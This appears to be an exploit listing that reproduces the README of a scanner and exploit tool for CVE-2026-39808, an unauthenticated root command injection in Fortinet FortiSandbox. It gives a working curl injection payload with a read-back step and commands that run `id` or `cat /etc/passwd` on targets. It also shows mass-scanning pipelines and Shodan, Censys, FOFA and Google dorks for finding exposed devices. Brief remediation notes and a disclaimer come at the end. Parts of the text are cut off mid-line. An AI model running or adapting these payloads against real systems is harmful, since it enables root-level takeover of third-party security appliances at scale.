Exploit for OS Command Injection in Fortinet Fortisandbox CVE-2026-39808

Name: Exploit for OS Command Injection in Fortinet Fortisandbox CVE-2026-39808
Rating: 5 (102 reviews)
2026-04-21 | CVSS 9.8
## https://sploitus.com/exploit?id=FAA1A934-A62D-5448-8D9B-5248D4D27C6B
# FortiSandbox RCE Scanner — CVE-2026-39808


  
  
  
  
  



  Unauthenticated OS Command Injection as root in Fortinet FortiSandbox



  Vulnerability •
  Installation •
  Usage •
  How It Works •
  Pipeline •
  Shodan Dorks •
  Disclaimer


---

## Vulnerability

**CVE-2026-39808** is a critical unauthenticated OS command injection vulnerability in Fortinet FortiSandbox. The `/fortisandbox/job-detail/tracer-behavior` API endpoint fails to sanitize the `jid` parameter, allowing an attacker to inject arbitrary OS commands that execute as **root** — without any authentication.

| Detail | Value |
|---|---|
| **CVE ID** | CVE-2026-39808 |
| **CVSS Score** | 9.8 (Critical) |
| **Attack Vector** | Network |
| **Authentication** | None |
| **Privileges** | Root |
| **Affected Versions** | FortiSandbox  /web/ng/out.txt)| HTTP/1.1
```

The output is written to `/web/ng/out.txt`, which is accessible at `/ng/out.txt` on the web server — providing a convenient read-back mechanism for blind command injection.

---

## Installation

Zero dependencies. Python 3.7+ standard library only.

```bash
git clone https://github.com/ynsmroztas/FortiSandbox-RCE-Exploit-CVE-2026-39808
cd FortiSandbox-RCE-Exploit-CVE-2026-39808
chmod +x fortisandbox_rce.py
```

---

## Usage

### Basic Scan

```bash
# Verify if a target is vulnerable (uses canary-based detection)
python3 fortisandbox_rce.py -u https://fortisandbox.target.com
```

### Execute Command

```bash
# Execute a specific command on the target
python3 fortisandbox_rce.py -u https://target.com --cmd "id"
python3 fortisandbox_rce.py -u https://target.com --cmd "cat /etc/passwd"
python3 fortisandbox_rce.py -u https://target.com --cmd "uname -a"
```

### Verify Only (No Command Execution)

```bash
# Only check if vulnerable, don't execute --cmd
python3 fortisandbox_rce.py -u https://target.com --verify-only
```

### With Burp Proxy

```bash
python3 fortisandbox_rce.py -u https://target.com --cmd "id" --proxy http://127.0.0.1:8080
```

### JSON Report

```bash
python3 fortisandbox_rce.py -u https://target.com -o report.json
```

### Pipeline Mode (Mass Scanning)

```bash
# From a URL list
cat targets.txt | python3 fortisandbox_rce.py --stdin --verify-only -o report.json

# subfinder → httpx → scanner
subfinder -d target.com -silent | httpx -silent | python3 fortisandbox_rce.py --stdin

# Shodan → scanner
shodan search 'title:"FortiSandbox"' --fields ip_str,port --separator : | \
  sed 's/^/https:\/\//' | httpx -silent | \
  python3 fortisandbox_rce.py --stdin --verify-only -o results.json
```

### All Options

```
usage: fortisandbox_rce.py [-h] [-u URL] [--stdin] [--cmd CMD] [--verify-only]
                           [--proxy PROXY] [--timeout TIMEOUT]
                           [--rate-limit RATE_LIMIT] [-o OUTPUT] [--no-banner]

Options:
  -u, --url URL           Target URL
  --stdin                 Read URLs from stdin (pipeline mode)
  --cmd CMD               OS command to execute (default: id)
  --verify-only           Only verify vulnerability, don't execute --cmd
  --proxy PROXY           HTTP proxy (e.g., http://127.0.0.1:8080)
  --timeout TIMEOUT       HTTP timeout in seconds (default: 15)
  --rate-limit RATE_LIMIT Delay between targets in ms (default: 0)
  -o, --output FILE       Output JSON report file
  --no-banner             Suppress banner
```

---

## How It Works

The scanner uses a **5-step verification process** with strict false positive prevention:

```
Step 1  →  Detect FortiSandbox (title/header fingerprint)
Step 2  →  Check if vulnerable endpoint exists
Step 3  →  Inject unique canary string via command injection
Step 4  →  Read /ng/out.txt and verify canary (strict plain-text validation)
Step 5  →  Execute user command + cleanup
```

### False Positive Prevention

The scanner implements multiple layers of validation to eliminate false positives:

- **HTML Detection** — If the output URL returns an HTML page (Angular SPA catch-all), it's flagged as false positive
- **Content-Type Validation** — Command output must not be `text/html`
- **Canary Isolation** — The canary must appear in clean plain text, not embedded in HTML tags
- **`id` Output Regex** — Strict `uid=\d+(\w+)` pattern matching with size sanity check (/dev/null | \
  tee vulnerable_fortisandbox.txt

# Chain with nuclei for further testing
cat vulnerable_fortisandbox.txt | nuclei -t cves/

# Silent mass scan with rate limiting
cat shodan_results.txt | \
  python3 fortisandbox_rce.py --stdin --verify-only --rate-limit 1000 --no-banner -o report.json
```

---

## Shodan Dorks

```
title:"FortiSandbox"
title:"FortiSandbox - Please login"
http.html:"FortiSandbox" port:443
"FortiSandbox" ssl:"Fortinet"
http.favicon.hash:-1222072778
```

**Censys:**
```
services.http.response.html_title:"FortiSandbox"
```

**FOFA:**
```
title="FortiSandbox - Please login"
title="FortiSandbox" && country="TR"
```

**Google Dork:**
```
intitle:"FortiSandbox - Please login"
```

---

## Manual Verification

If you prefer to verify manually using curl:

```bash
# Step 1: Inject command
curl -s -k --get "https://TARGET/fortisandbox/job-detail/tracer-behavior" \
  --data-urlencode "jid=|(id > /web/ng/out.txt)|"

# Step 2: Read output
curl -s -k "https://TARGET/ng/out.txt"
# Expected: uid=0(root) gid=0(root) groups=0(root)
```

---

## Remediation

- **Upgrade** FortiSandbox to version **4.4.9 or above**
- If immediate patching is not possible:
  - Restrict network access to the FortiSandbox management interface
  - Use firewall rules to block external access to `/fortisandbox/job-detail/` endpoints
  - Monitor logs for suspicious `jid` parameter values containing pipe characters

---

## Timeline

| Date | Event |
|---|---|
| November 2025 | Vulnerability discovered |
| April 2026 | CVE-2026-39808 published |
| April 2026 | Patched in FortiSandbox 4.4.9 |

---

## References

- [Fortinet PSIRT Advisory — FG-IR-25-325](https://fortiguard.fortinet.com/psirt/FG-IR-25-325)
- [CVE-2026-39808 — NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-39808)

---

## Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper written authorization before testing. The author assumes no liability for misuse of this tool.

---

## Author

**mitsec** — [@ynsmroztas](https://x.com/ynsmroztas)

- Portfolio: [ynsmroztas.github.io](https://ynsmroztas.github.io)
- 100+ Hall of Fame | 2,430+ Vulnerabilities Disclosed | 1,100+ Critical Findings

---


  If this tool helped you, consider giving it a ⭐